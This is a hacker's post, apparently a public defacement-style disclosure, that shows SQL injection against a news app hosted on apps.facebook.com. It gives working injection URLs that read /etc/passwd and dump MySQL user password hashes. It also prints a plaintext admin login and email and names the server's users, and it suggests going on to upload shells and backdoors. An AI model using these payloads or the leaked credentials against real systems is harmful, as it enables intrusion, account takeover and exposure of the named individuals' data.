Facebook is a social networking website that is operated and privately owned by Facebook, Inc.[1] Users can add friends and send them messages, and update their personal profiles to notify friends about themselves. Additionally, users can join networks organized by city, workplace, school, and region. The website's name stems from the colloquial name of books given at the start of the academic year by university administrations with the intention of helping students get to know each other better.


The website currently has more than 250 million active users worldwide.
Facebook is not capable of securing their database. Millions (LOTS OF MILLIONS) of accounts, email addresses and passwords up for grabs by anyone.

Another Sql Injection flaw on Facebook.com and this time on apps.facebook.com .I decided to make public this issue.

This bug allows a potential attacker to execute SQL queries directly into the database easily by manipulating the URL.

Let me show you a few concretes examples of vulnerables parameters:

First Let-s see version of database and the name and the user of mysql seveur :



SQL Injection FLaw :

http://apps.facebook.com/newscloud/?p=tweets&o=view&id=1231+union+select+1,2,3,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,5,6,7,8,9,10--

Data :

database version : 5.0.32-Debian_7etch8-log
database name : nc
user of Mysql Serveur : root@localhost

in the second screen shot u can execute function load_file() which u can use it to read files like : /etc/passwd , this functions is executed succefully then magic_quote_gpc=OFF , with a little patience , u can find a writable directory and injecting malicious code we get command line access with wich we can do anything withe website : upload backdoor - upload shell - redirect even deface the Whole Website




Sql Injection Flaw :

http://apps.facebook.com/newscloud/?p=tweets&o=view&id=1231+union+select+1,2,3,4,5,6,7,8,load_file%280x2f6574632f706173737764%29,10--

Data :

root: x:0:0:root:/root:/bin/bash
daemon: x:1:1:daemon:/usr/sbin:/bin/sh
bin: x:2:2:bin:/bin:/bin/sh
sys: x:3:3:sys:/dev:/bin/sh
sync: x:4:65534:sync:/bin:/bin/sync
games: x:5:60:games:/usr/games:/bin/sh man: x:6:12:man:/var/cache/man:/bin/sh
lp: x:7:7:lp:/var/spool/lpd:/bin/sh
mail: x:8:8:mail:/var/mail:/bin/sh
news: x:9:9:news:/var/spool/news:/bin/sh uucp: x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy: x:13:13:proxy:/bin:/bin/sh
www-data: x:33:33:www-data:/var/www:/bin/sh
backup: x:34:34:backup:/var/backups:/bin/sh
list: x:38:38:Mailing List Manager:/var/list:/bin/sh irc: x:39:39:ircd:/var/run/ircd:/bin/sh
gnats: x:41:41:Gnats
Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody: x:65534:65534:nobody:/nonexistent:/bin/sh
user: x:1000:1000:user,,,:/home/user:/bin/bash
sshd: x:100:65534::/var/run/sshd:/usr/sbin/nologin
todd: x:1001:1001:Todd Weaver,,,:/home/todd:/bin/bash jeff: x:1002:1002:Jeff Reifman,,,:/home/jeff:/bin/bash mysql: x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false Debian-exim: x:102:104::/var/spool/exim4:/bin/false
statd: x:103:65534::/var/lib/nfs:/bin/false
identd: x:104:65534::/var/run/identd:/bin/false
adam: x:1003:1003:Adam Faja,,,:/home/adam:/bin/bash rick: x:1004:1004:Rick Kowal,,,:/home/rick:/bin/bash
russell: x:1005:1005:Russell
Branca,,,:/home/russell:/bin/bash
daniel: x:1006:1006: Daniel
MacDonald,,,:/home/daniel:/bin/bash
postfix: x:105:106::/var/spool/postfix:/bin/false


Let-s move on to another SQL injection vulnerable
parameter. u can see in the image username and
password of root and others users in serveur :



SQLi FLaw :

http://apps.facebook.com/newscloud/?p=tweets&o=view&id=1231+union+select+1,2,3,concat%28user,0x3A,Password,0x3a%29,5,6,7,8,9,10+FROM+mysql.user--

Data :

root:*3598E4E4B3114472E366A732E76DF04A8EAD837E
debian-sys-maint:*AB379D396823B1623A5D34D9A65457DBA5A329A9
daniel:*3D5A714BCA47BD705005F4959F1C6B5D55739427
russell:*3494B7E8859FB8988BE1EA7ACAA1E352A1298CFF
rick:*9367E0F9550CB9AE8660E76AD01245CE4665AA84
phplistman:*3598E4E4B3114472E366A732E76DF04A8EAD837E


now lest's see table : phplist_admin :



SQLi Flaw :

http://apps.facebook.com/newscloud/?p=tweets&o=view&id=1231+
union+select+1,2,3,concat_ws(0x3A,id,loginname,password,email%29,5,6,7,8,9,10+
FROM+phplistdb.phplist_admin--

Data :

User id = 2
USerName = jeff
Password = Cloud9
Email = jeff@reifman.org

Let-s move on to another SQL injection vulnerable parameter. This time it-s Blind SQL Injection. Interesting in the image is that, firstly, the error wich reveals proof that server data can be accessed from this point.

First Img :



in this first image we see all content

Let-s see the seconde image :



then version of database is : 5
It's Over

now we conclude that this website which is famous not secured and u can find another Bugs in Other Application!
I hope u enjoyed

To Be continued Incha Allah


All rights Reserved For : SoldierOfAllah And Owned-m.com